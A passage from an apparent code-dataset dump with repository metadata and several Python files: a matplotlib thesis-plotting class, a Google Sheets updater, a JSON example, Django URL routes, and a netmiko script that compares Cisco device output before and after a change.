'{}'.format(string_to_process)
logger.error(error)
raise AnalysisException
return xml_main, next_footnote
| 35.391489 | 79 | 0.597451 | 1,032 | 8,317 | 4.718023 | 0.236434 | 0.024646 | 0.012939 | 0.014377 | 0.204354 | 0.176422 | 0.167386 | 0.114397 | 0.079482 | 0.054631 | 0 | 0.002332 | 0.329686 | 8,317 | 234 | 80 | 35.542735 | 0.871031 | 0.504028 | 0 | 0.395062 | 0 | 0 | 0.103842 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024691 | false | 0.012346 | 0.037037 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5a35747d0cd68dc4fa0ce60853f7e9f138b0cb3 | 21,201 | py | Python | ThesisPlot.py | dtiarks/ThesisPlot | b9eaa5f2b2c472667cb17b2ba5a0471c741f0abe | [
"MIT"
] | 1 | 2018-12-27T01:35:40.000Z | 2018-12-27T01:35:40.000Z | ThesisPlot.py | dtiarks/ThesisPlot | b9eaa5f2b2c472667cb17b2ba5a0471c741f0abe | [
"MIT"
] | null | null | null | ThesisPlot.py | dtiarks/ThesisPlot | b9eaa5f2b2c472667cb17b2ba5a0471c741f0abe | [
"MIT"
] | null | null | null | import locale
import numpy as np
import io
import json
import pandas as pd
import ast
import os
# Set to German locale to get comma decimal separater
locale.setlocale(locale.LC_NUMERIC, 'deu_deu')
#locale.setlocale(locale.LC_NUMERIC, 'de_DE.utf8')
import matplotlib as mpl
mpl.use('pgf')
preamble = [
# use utf8 fonts becasue your computer can handle it :)
r"\usepackage[utf8x]{inputenc}",
# plots will be generated using this preamble
r"\usepackage[T1]{fontenc}",
r"\usepackage[ngerman]{babel}",
r"\usepackage{siunitx}",
r"\usepackage{lmodern}",
r"\usepackage{amsmath}",
r"\usepackage{amsfonts}",
r"\sisetup{detect-all}",
r"\sisetup{locale = DE}"
]
pgf_with_latex = { # setup matplotlib to use latex for output
"pgf.texsystem": "pdflatex", # change this if using xetex or lautex
"text.usetex": True, # use LaTeX to write all text
"text.latex.unicode": True,
"font.family": "sans-serif",
# blank entries should cause plots to inherit fonts from the document
"font.serif": [],
"font.sans-serif": ['Helvetica'],
"font.monospace": [],
"axes.labelsize": 11, # LaTeX default is 10pt font.
"font.size": 11,
"legend.fontsize": 10, # Make the legend/label fonts a little smaller
"xtick.labelsize": 10,
"ytick.labelsize": 10,
"figure.figsize": [0.9*5.67, 1.76], # default fig size of 0.9 textwidth
"errorbar.capsize": 0, # set standard
"markers.fillstyle": 'none',
"lines.markersize": 1,
"lines.linewidth": 1.5,
"legend.fancybox": True,
"mathtext.fontset": "cm",
"text.latex.preamble": preamble,
# "pgf.debug" : True,
#"legend.loc": 1,
"pgf.preamble": preamble,
"legend.numpoints": 1,
"legend.scatterpoints": 1,
"axes.formatter.use_locale": True,
"figure.subplot.bottom" : 0.19
}
mpl.rcParams.update(pgf_with_latex)
import matplotlib.pyplot as plt
class ThesisPlot(object):
colors=['b','r','g','k','y']
linestyles=['-','-','-','-','-','-']
linewidths=[1.5,1.5,1.5,1.5,1.5,1.5]
markers=['o','o','o','o','o']
elinewidth = 0.8
def __init__(self):
self.dicts=dict()
def generatePlots(self):
for d in self.dicts:
self.f=plt.figure()
# self.dicts[d]['json']=list(self.dicts[d]['json'])[::-1]
# print type(self.dicts[d]['json'])
for subplot_i, sp_ax in zip(range(len(self.dicts[d]['json'])-1,-1,-1), self.dicts[d]['json']):
ax=self.f.add_subplot(sp_ax)
ylabeloffset=self.dicts[d]['ylabeloff'][subplot_i]
print "ylavel off: "
print ylabeloffset
if ylabeloffset:
ax.yaxis.set_label_coords(ylabeloffset,0.5)
num_curves = len(self.dicts[d]['json'][sp_ax])
cs=self.dicts[d]['color']
if cs==None:
cs=self.colors
if len(np.shape(cs))==2:
cs=cs[subplot_i]
ls=self.dicts[d]['linestyle']
if ls==None:
ls=self.linestyles
if len(np.shape(ls))==2:
ls=ls[subplot_i]
lws=self.dicts[d]['linewidths']
if lws==None:
lws=self.linewidths
if len(np.shape(lws))==2:
lws=lws[subplot_i]
tl=self.dicts[d]['tight']
if tl:
self.f.tight_layout(w_pad=self.dicts[d]['wpad'],h_pad=self.dicts[d]['hpad'])
xticks = self.dicts[d]['xticks']
print "shape"
print np.shape(xticks)
if np.shape(xticks)[0]==1:
ax.xaxis.set_ticks(xticks[0])
elif len(np.shape(xticks))==1 and len(xticks) != 0:
if xticks[subplot_i] is not None:
ax.xaxis.set_ticks(xticks[subplot_i])
yticks = self.dicts[d]['yticks']
if len(np.shape(yticks))==0:
ax.yaxis.set_ticks(yticks)
elif len(np.shape(yticks))==1 and len(yticks) != 0:
if yticks[subplot_i] is not None:
ax.yaxis.set_ticks(yticks[subplot_i])
ms=self.dicts[d]['markers']
if ms==None:
ms=self.markers
if len(np.shape(ms))==2:
ms=ms[subplot_i]
for (c,l,lw,sp,m) in zip(cs[:num_curves],ls[:num_curves],lws[:num_curves],self.dicts[d]['json'][sp_ax],ms[:num_curves]):
if self.dicts[d]['json'][sp_ax][sp]['type']=='errorbar':
df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
df.sort(inplace=True)
x=np.array(df.index.values,dtype=np.float32)
y=np.array(df.values,dtype=np.float32)
dfErr = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['yerr']),orient='index')
dfErr.set_index(np.array(dfErr.index.values,dtype=np.float32),inplace=True)
dfErr.sort(inplace=True)
yerr=np.array(dfErr.values,dtype=np.float32)
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
try:
ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
ax.set_xlim(*xl)
except:
print "No x-limit found"
try:
yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
ax.set_ylim(*yl)
except:
print "No y-limit found"
ax.errorbar(x,y,yerr=yerr,label=label,color=c,ls=l,lw=lw,marker=m,markersize='5', elinewidth=self.elinewidth)
elif self.dicts[d]['json'][sp_ax][sp]['type']=='plot':
df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
df.sort(inplace=True)
x=np.array(df.index.values,dtype=np.float32)
y=np.array(df.values,dtype=np.float32)
try:
m=self.dicts[d]['json'][sp_ax][sp]['margin']
ax.margins(*m)
print "found margin"
except:
print "No margin"
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
try:
ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
ax.set_xlim(*xl)
except:
print "No x-limit found"
try:
yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
ax.set_ylim(*yl)
except:
print "No y-limit found"
ax.plot(x,y,label=label,color=c,ls=l,lw=lw)
elif self.dicts[d]['json'][sp_ax][sp]['type']=='scatter':
df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
df.sort(inplace=True)
x=np.array(df.index.values,dtype=np.float32)
y=np.array(df.values,dtype=np.float32)
try:
m=self.dicts[d]['json'][sp_ax][sp]['margin']
ax.margins(*m)
print "found margin"
except:
print "No margin"
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
try:
ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
ax.set_xlim(*xl)
except:
print "No x-limit found"
try:
yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
ax.set_ylim(*yl)
except:
print "No y-limit found"
ax.scatter(x,y,label=label,color=c,marker='o',s=16)
elif self.dicts[d]['json'][sp_ax][sp]['type']=='axh':
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
ax.axhline(np.float(self.dicts[d]['json'][sp_ax][sp]['y']),label=label,color=c,ls=l,lw=lw)
elif self.dicts[d]['json'][sp_ax][sp]['type']=='axv':
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
ax.axvline(np.float(self.dicts[d]['json'][sp_ax][sp]['y']),label=label,color=c,ls=l,lw=lw)
#
if self.dicts[d]['legend']:
ax.legend(loc=self.dicts[d]['loc'])
try:
num=self.dicts[d]['json'][sp_ax][sp]['num']
except:
num=None
if num is not None:
ax.text(0.1, 0.9, r'\textbf{(' + num + ')}', transform=ax.transAxes,
weight='bold', ha='center', va='center')
xwin, ywin = ax.transAxes.transform((0.1, 0.9))
for l in ax.yaxis.get_major_ticks():
# check if a label overlaps with enumeration
bbox = l.label1.get_window_extent()
print bbox, xwin, ywin
if self._overlaps(np.array(bbox), xwin, ywin):
l.label1.set_visible(False)
# if len(self.f.axes) > 1:
# for n, ax in enumerate(self.f.axes):
# ax.text(0.1, 0.9, r'\textbf{(' + chr(len(self.f.axes)-1-n + 97) + ')}', transform=ax.transAxes,
# weight='bold', ha='center', va='center')
# # label position in window coordinates
# xwin, ywin = ax.transAxes.transform((0.1, 0.9))
# for l in ax.yaxis.get_major_ticks():
# # check if a label overlaps with enumeration
# bbox = l.label1.get_window_extent()
# print bbox, xwin, ywin
# if self._overlaps(np.array(bbox), xwin, ywin):
# l.label1.set_visible(False)
s=self.figsize(self.dicts[d]['size'],1.0)
self.f.subplots_adjust(bottom=self.dicts[d]['bottom'])
self.f.set_size_inches(*s)
print self.dicts[d]['outfile']
self.f.savefig(self.dicts[d]['outfile'])
self.f.savefig(self.dicts[d]['outfile']+".pdf")
# self.f.clear()
def _overlaps(self, bbox, x, y, dist=10):
xs, ys = bbox.T
if (np.min(np.abs(xs - x)) > dist and np.prod(xs - x) > 0) or \
(np.min(np.abs(ys - y)) > dist and np.prod(ys - y) > 0):
return False
else:
# print np.min(np.abs(xs-x)), np.prod(xs-x), np.min(np.abs(ys-y)),
# np.prod(ys-y)
return True
def parsePlotDict(self,filename):
with io.open(filename, 'r', encoding='utf-8') as f:
plotDict=json.load(f)
return plotDict
def addPlot(self,name,outname,figid,size=2,ls=None,cs=None,lw=None,tl=False,w_pad=2.,h_pad=2.,legend=False,lloc=1,m=None, xticks=[], yticks=[], bottom=0.2,yoffset=None):
nplots=len(self.parsePlotDict(name))
if yoffset is None:
yoffset=[None for _ in range(nplots)]
self.dicts.update({figid:{'infile':name,
'outfile':outname,
'size':size,
'json':self.parsePlotDict(name),
'linestyle':ls,
'color':cs,
'linewidths':lw,
'markers':m,
'tight':tl,
'wpad':w_pad,
'hpad':h_pad,
'loc':lloc,
'legend':legend,
'xticks':xticks,
'yticks':yticks,
'bottom':bottom,
'ylabeloff':yoffset}})
def figsize(self, rows, scale):
# Get this from LaTeX using \the\textwidth
fig_width_pt = 405.45183
inches_per_pt = 1.0 / 72.27 # Convert pt to inch
# Aesthetic ratio (you could change this) * 0.5
golden_mean = rows * 0.51 * (np.sqrt(5.0) - 1.0) / 2.0
fig_width = fig_width_pt * inches_per_pt * scale # width in inches
fig_height = fig_width * golden_mean # height in inches
fig_size = [fig_width, fig_height]
return fig_size
if __name__=='__main__':
TP=ThesisPlot()
# TP.addPlot("Chap2\Groupdelay\groupdelay.json","2_2_groupdelay.pgf","Chap2_Fig2.2")
# TP.addPlot(os.path.join("Chap2","Suszept","suszept.json"),"2_1_suszept.pgf","Chap2_Fig2.1",size=2,cs=['b','k','r'],ls=['-','--','-'],lw=[1.5,1,1.5], bottom=0.11)
# TP.addPlot(r"blank1.json","2_3_blank.pgf","Chap2_Fig2.3",size=1)
TP.addPlot(os.path.join("Chap2","Transient","eit_propagation.json"),"2_3_eit_propagation.pgf","Chap2_Fig2.3",size=1,tl=True,yoffset=[-0.13,None],w_pad=1.6, bottom=0.22)
# TP.addPlot("Chap2\Foerster\defect.json","2_4_foerster_defect.pgf","Chap2_Fig2.4",size=1.0,legend=True,cs=['b','r','k'])
# TP.addPlot(os.path.join("Chap2","BlockadeSuszept","blockade_suszept.json"),"2_7_blockade_suszept.pgf","Chap2_Fig2.7",size=1.0,legend=True,cs=['b','r'], bottom=0.22,h_pad=0.0,w_pad=1.2,tl=True)
# TP.addPlot(os.path.join("Chap2","KondPhase","cond_phase.json"),"2_8_cond_phase.pgf","Chap2_Fig2.8",size=1.0,cs=['b','k','r'],yoffset=[-0.145,None],legend=True,h_pad=0.0,w_pad=1.4,tl=True,lloc=9, bottom=0.22)
# TP.addPlot(os.path.join("Chap2","MoleculeMemory","memory.json"),"2_10_memory.pgf","Chap2_Fig2.10",size=1.0,cs=['b','r'],yoffset=[-0.19,None],legend=True,h_pad=0.0,w_pad=1.9,tl=True,lloc=4, bottom=0.22)
# TP.addPlot(os.path.join("Chap3","Plugs","density_profile.json"),"3_2_density_profile.pgf","Chap3_Fig3.2",size=1.0,cs=['b','r'],legend=False,h_pad=0.0,w_pad=1.5,tl=False,lloc=4, bottom=0.22)
# TP.addPlot(os.path.join("Chap3","Plugs","pluglength.json"),"3_1_pluglength.pgf","Chap3_Fig1.1",size=1.0,cs=['b','r'],legend=False,h_pad=0.0,w_pad=1.5,tl=True,lloc=4, bottom=0.22)
# TP.addPlot(os.path.join("Chap3","IF","eif_lock.json"),"3_10_eif_lock.pgf","Chap3_Fig3.10",size=1.0,cs=['b','r'],legend=True,h_pad=0.0,w_pad=2.3,tl=True,lloc=4, bottom=0.22)
# TP.addPlot(os.path.join("Chap3","Laser","cavity_characterization.json"),"3_5_cavity.pgf","Chap3_Fig3.5",size=1.0,cs=['b','r'],legend=True,h_pad=0.0,w_pad=1.,tl=True,lloc=1, bottom=0.22)
# TP.addPlot(r"Chap5\sideband_postselected_phaseshift.json","5_2_phaseshift.pgf","Chap5_Fig5.2",size=1.0,cs=['b','r'],legend=True,h_pad=0.0,w_pad=1.,tl=True,lloc=1)
# TP.addPlot(os.path.join("Chap5","sideband_postselected_phaseshift.json"),"5_2_phaseshift.pgf","Chap5_Fig5.2",size=1.0,cs=['b','k','r'],legend=True,h_pad=0,w_pad=0.,lloc=1, bottom=0.22)
# TP.addPlot(os.path.join("Chap5","spectrum.json"),"5_1_spectrum.pgf","Chap5_Fig5.2",size=1.0,cs=['b','r','r','b'], yoffset=[-0.18,None],legend=True,h_pad=0,w_pad=2.,lloc=1,tl=True, bottom=0.22)
# TP.addPlot(os.path.join("Chap5","pol_spectra.json"),"5_4_spectra.pgf","Chap5_Fig5.4",size=1.0,cs=['b','b','r','k','r'],yoffset=[-0.14,None],legend=False,tl=True,h_pad=0,w_pad=1.8,lloc=1,ls=['-','','-','-',''],m=['','o','','','o'], bottom=0.22)
# TP.addPlot(os.path.join("Chap5","cond_phase_vs_density.json"),"5_7_phase.pgf","Chap5_Fig5.7",size=1.0,cs=['b','b','r','r'],legend=False,tl=False,h_pad=0,w_pad=1.8,lloc=1,ls=['-','','-',''],m=['','o','','o',''], bottom=0.23)
# TP.addPlot(os.path.join("Chap5","propagation.json"),"5_5_propagation.pgf","Chap5_Fig5.5",size=1.0,cs=['b','b','r','r'],xticks=[np.arange(11,14.5,1)],yoffset=[-0.18,None],legend=False,tl=True,h_pad=0,w_pad=2.2,lloc=1,ls=['-','','-',''],m=['','o','','o',''], bottom=0.22)
# TP.addPlot(os.path.join("Chap5","storage_retrieval.json"),"5_6_storage.pgf","Chap5_Fig5.6",size=1.0,cs=['b','r'],legend=False,tl=False,h_pad=0,w_pad=0,lloc=1,ls=['','-'], bottom=0.22)
# TP.addPlot(os.path.join("Chap2","Molecules","avg_number.json"),"2_2_moleculetest.pgf","Chap5_Fig2.2",size=1.0)
# TP.addPlot(os.path.join("Chap6","memory_spectra.json"),"6_1_spectra.pgf","Chap6_Fig6.1",size=2,cs=[['b','b'],['r','r'],['b','b'],['r','r']],ls=['-',''], tl=True,h_pad=-1.,w_pad=0,yticks=[None,None,[-9,-6,-3,0,3,6,9],None], bottom=0.11)
# TP.addPlot(os.path.join("Chap6","memory_extinction.json"),"6_2_extinction.pgf","Chap6_Fig6.2",size=2,cs=['b','r'],xticks=[np.arange(-0.6,0.4,0.2),None,np.arange(-0.6,0.4,0.2),None],yticks=[None,None,np.arange(0,900,200),None], bottom=0.11)
# TP.addPlot(os.path.join("Chap6","memory_coherence.json"),"6_3_coherence.pgf","Chap6_Fig6.3",size=3,cs=['b','b','r','r'], ls=['','-','','-'], bottom=0.075)
# TP.addPlot(os.path.join("Chap6","darktime.json"),"6_4_darktime.pgf","Chap6_Fig6.4",size=1,yoffset=[-0.14,None],cs=(('b','b','b'),('r','b','b')), ls=[['','-',''],['','-','']], tl=True,h_pad=0,w_pad=1.5, bottom=0.22)
# TP.addPlot(os.path.join("Chap2","Molecules","avg_number.json"),"2_avgnumber.pgf","Chap2_Fig2.2")
TP.generatePlots() | 52.738806 | 274 | 0.466582 | 2,701 | 21,201 | 3.559422 | 0.144391 | 0.054296 | 0.057208 | 0.055336 | 0.505201 | 0.468379 | 0.431974 | 0.412835 | 0.392969 | 0.363532 | 0 | 0.039145 | 0.362577 | 21,201 | 402 | 275 | 52.738806 | 0.672266 | 0.28527 | 0 | 0.358885 | 0 | 0 | 0.103348 | 0.011203 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.031359 | null | null | 0.076655 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5a7b8b0481012f5ade5147dd6e2ed6513934354 | 1,695 | py | Python | update_damage_sheet.py | faith-grins/RS-RS-DamageRankings | 667387bb8971ea57d8ff669efb62ea7c2ef61f8e | [
"Apache-2.0"
] | null | null | null | update_damage_sheet.py | faith-grins/RS-RS-DamageRankings | 667387bb8971ea57d8ff669efb62ea7c2ef61f8e | [
"Apache-2.0"
] | null | null | null | update_damage_sheet.py | faith-grins/RS-RS-DamageRankings | 667387bb8971ea57d8ff669efb62ea7c2ef61f8e | [
"Apache-2.0"
] | null | null | null | import gspread
# If modifying these scopes, delete the file token.json.
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
CLIENT_SECRET_FILE = '.secrets/PythonSheetsApiSecret.json'
CREDENTIALS_TOKEN = '.secrets/token.json'
# The ID and range of a sample spreadsheet.
SPREADSHEET_ID = '1oc5TC_nGzLXk4sP3zhlyFeYt526cxXXVeDtvMDFWbno'
VALUE_RENDER_OPTION = 'FORMULA'
VALUE_INPUT_OPTION = 'RAW'
stats_starting_row = 4
stylte_stats_sheet = 'StyleStats'
style_stats_range = 'B4:T'
style_final_str_column = 'StyleStats!M4:M'
style_final_end_column = 'StyleStats!N4:N'
style_final_dex_column = 'StyleStats!O4:O'
style_final_agi_column = 'StyleStats!P4:P'
style_final_int_column = 'StyleStats!Q4:Q'
style_final_wil_column = 'StyleStats!R4:R'
style_final_lov_column = 'StyleStats!S4:S'
style_final_cha_column = 'StyleStats!T4:T'
class Character:
rows = []
name = ''
def login():
return gspread.oauth(credentials_filename=CLIENT_SECRET_FILE, authorized_user_filename=CREDENTIALS_TOKEN)
def get_styles(auth):
style_sheet = auth.open_by_key(SPREADSHEET_ID)
styles = style_sheet.worksheet(stylte_stats_sheet).get(style_stats_range, value_render_option=VALUE_RENDER_OPTION)
characters = {}
for i, s in enumerate(styles):
if s[0] not in characters:
characters[s[0]] = [i + stats_starting_row]
else:
characters[s[0]].append(i + stats_starting_row)
return characters
def update_sheet(auth, characters):
style_sheet = auth.open_by_key(SPREADSHEET_ID)
style_data_sheet = style_sheet.worksheet(stylte_stats_sheet)
style_data_sheet.update('A1', 'Testing')
if __name__ == '__main__':
update_sheet(login(), '')
| 30.818182 | 118 | 0.756342 | 231 | 1,695 | 5.186147 | 0.445887 | 0.066778 | 0.042571 | 0.03005 | 0.118531 | 0.118531 | 0.0601 | 0.0601 | 0 | 0 | 0 | 0.014384 | 0.138643 | 1,695 | 54 | 119 | 31.388889 | 0.806164 | 0.056637 | 0 | 0.051282 | 0 | 0 | 0.18985 | 0.049499 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.025641 | 0.025641 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5a938e5e2ec369977b37c0a78e456d48e469534 | 350 | py | Python | Intermediate/json-data.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | Intermediate/json-data.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | Intermediate/json-data.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | import json as j
# CONVERTING TO JSON
data = {
"Name": "John Doe",
"Age": "22"
}
y = j.dumps(data)
print(y)
# A LIST IS CONVERTED INTO JSON EQUIVALENT ARRAY
data = [1, 2, 3, 4, 5]
i = j.dumps(data)
print(i)
# READING FROM JSON
x = '{ "name":"John", "age":30, "city":"New York"}'
y = j.loads(x)
print(y)
print(y["age"])
| 16.666667 | 52 | 0.554286 | 59 | 350 | 3.288136 | 0.610169 | 0.092784 | 0.103093 | 0.154639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034351 | 0.251429 | 350 | 20 | 53 | 17.5 | 0.706107 | 0.237143 | 0 | 0.142857 | 0 | 0 | 0.26749 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5aa8f799f1cb16c92d8d94d9ce091e420f85e52 | 958 | py | Python | programdom/problems/urls.py | vCra/Programdom | 23d734409102917734e67d233768b494904a5cef | [
"MIT"
] | 1 | 2021-06-14T01:08:55.000Z | 2021-06-14T01:08:55.000Z | programdom/problems/urls.py | vCra/Programdom | 23d734409102917734e67d233768b494904a5cef | [
"MIT"
] | 10 | 2019-01-28T16:03:12.000Z | 2019-01-28T16:09:48.000Z | programdom/problems/urls.py | vCra/Programdom | 23d734409102917734e67d233768b494904a5cef | [
"MIT"
] | null | null | null | from django.urls import path
from programdom.problems.views import ProblemStudentView, ProblemListView, ProblemDetailView, ProblemDeleteView, \
ProblemCreateView, ProblemTestcaseCreateView, ProblemTestCaseUpdateView, ProblemTestCaseDeleteView
urlpatterns = [
path("", ProblemListView.as_view(), name="problem_list"),
path("new/", ProblemCreateView.as_view(), name="problem_create"),
path("<int:pk>/", ProblemDetailView.as_view(), name="problem_detail"),
path("<int:pk>/delete/", ProblemDeleteView.as_view(), name="problem_delete"),
path("<int:pk>/student/", ProblemStudentView.as_view(), name="problem_student"),
path("<int:pk>/tests/new/", ProblemTestcaseCreateView.as_view(), name="problem_test_new"),
path("<int:pk>/tests/<int:tc_pk>/", ProblemTestCaseUpdateView.as_view(), name="problem_test_update"),
path("<int:pk>/tests/<int:tc_pk>/delete/", ProblemTestCaseDeleteView.as_view(), name="problem_test_delete"),
]
| 50.421053 | 114 | 0.746347 | 104 | 958 | 6.673077 | 0.317308 | 0.069164 | 0.115274 | 0.195965 | 0.151297 | 0.060519 | 0.060519 | 0 | 0 | 0 | 0 | 0 | 0.088727 | 958 | 18 | 115 | 53.222222 | 0.79496 | 0 | 0 | 0 | 0 | 0 | 0.259916 | 0.063674 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5ab3b077876292916d291b072dc3571dc23411f | 3,023 | py | Python | Diff-TVT.py | vipersnews/py-tvt-nbn | 02164752db44967c33001f0c738f69feb1a2b283 | [
"Unlicense"
] | null | null | null | Diff-TVT.py | vipersnews/py-tvt-nbn | 02164752db44967c33001f0c738f69feb1a2b283 | [
"Unlicense"
] | null | null | null | Diff-TVT.py | vipersnews/py-tvt-nbn | 02164752db44967c33001f0c738f69feb1a2b283 | [
"Unlicense"
] | null | null | null | from getpass import getpass
import netmiko
import re
import difflib
def make_connection (ip, username, password):
return netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password)
def get_ip (input):
return(re.findall(r'(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)', input))
def get_ips (file_name):
for line in open(file_name, 'r').readlines():
line = get_ip(line)
for ip in line:
ips.append(ip)
def to_doc_a(file_name, varable):
f=open(file_name, 'a')
f.write(varable)
f.write('\n')
f.close()
def to_doc_w(file_name, varable):
f=open(file_name, 'w')
f.write(varable)
f.close()
#This will be a list of the devices we want to SSH to
ips = []
#Pull the IPs.txt is a list of the IPs we want to connect to
#This function pulls those IPs out of the txt file and puts them into a list
get_ips("input/IPs.txt")
print('#' * 50)
print('#' * 50, '\n HOSTS', ips, '\n', " Make sure you have checked your individual command files", '\n')
print("IF INCORRECT QUIT NOW CTRL^C ", '\n', '#' * 50)
print('#' * 50)
#Prompt user for account info
username = input("Username: ")
password = getpass()
#This is required for our Diff Loop, pre-tvt store in Before, Post in After
file_name_input = input("For Pre-TVT type Before.txt - For Post-TVT type After.txt : ")
#For each IP in our IPs.txt file, we will look for that IP.txt for the individual commands for the host
for ip in ips:
#Connect to a device
file_name_tup = ("output/" + ip, "-" + file_name_input )
file_name = ''.join(file_name_tup)
to_doc_w(file_name, "")
commands_list = []
# Get the commands from unique ipaddress.txt and append to our list
with open("input/" + ip + '.txt', 'r') as f:
for line in f:
commands_list.append(line)
try:
net_connect = make_connection(ip , username, password)
print("Completing " + ip )
#Run all our commands and append to our file_name
for commands in commands_list:
output = net_connect.send_command_timing(commands)
results = output + '\n'
#Next we will append the output to the individual results file
to_doc_a(file_name, results)
except:
print( ip + " Failed to connect")
#Loop to determine actions for Pre-TVT or Post-TVT
#Before Just prints complete
if "Before" in file_name:
print('Completed')
#After will run the diff comparing before and after
elif "After" in file_name:
for ip in ips:
file_name_before = ("output/" + ip, "-" + "Before.txt" )
file_name_after = ("output/" + ip, "-" + "After.txt" )
fromfile = ''.join(file_name_before)
tofile = ''.join(file_name_after)
fromlines = open(fromfile, 'U').readlines()
tolines = open(tofile, 'U').readlines()
diff = difflib.HtmlDiff().make_file(fromlines,tolines,fromfile,tofile)
f = open("output/" + ip + "-changes.html", "w")
f.write(diff)
f.close
print("Open output/" + ip + "-changes.html to see difference")
#If there was something other than before.txt or after.txt
else:
print('Before or After not detected')
| 32.159574 | 120 | 0.68872 | 505 | 3,023 | 4.019802 | 0.29901 | 0.078818 | 0.016256 | 0.023645 | 0.116256 | 0.042365 | 0.042365 | 0.014778 | 0.014778 | 0.014778 | 0 | 0.015482 | 0.166722 | 3,023 | 93 | 121 | 32.505376 | 0.790393 | 0.253721 | 0 | 0.123077 | 0 | 0.015385 | 0.218109 | 0.039697 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.076923 | 0.061538 | 0.030769 | 0.153846 | 0.138462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5ac1349e31fac2f5f5e8ce25f69ca68f7e752f0 | 28 | py | Python | pyiArduinoI2Cmotor/__init__.py | tremaru/pyiArduinoI2Cmotor | 5e83c4ab1beaf6041663f4399028a5d3f5fa3f56 | [
"MIT"
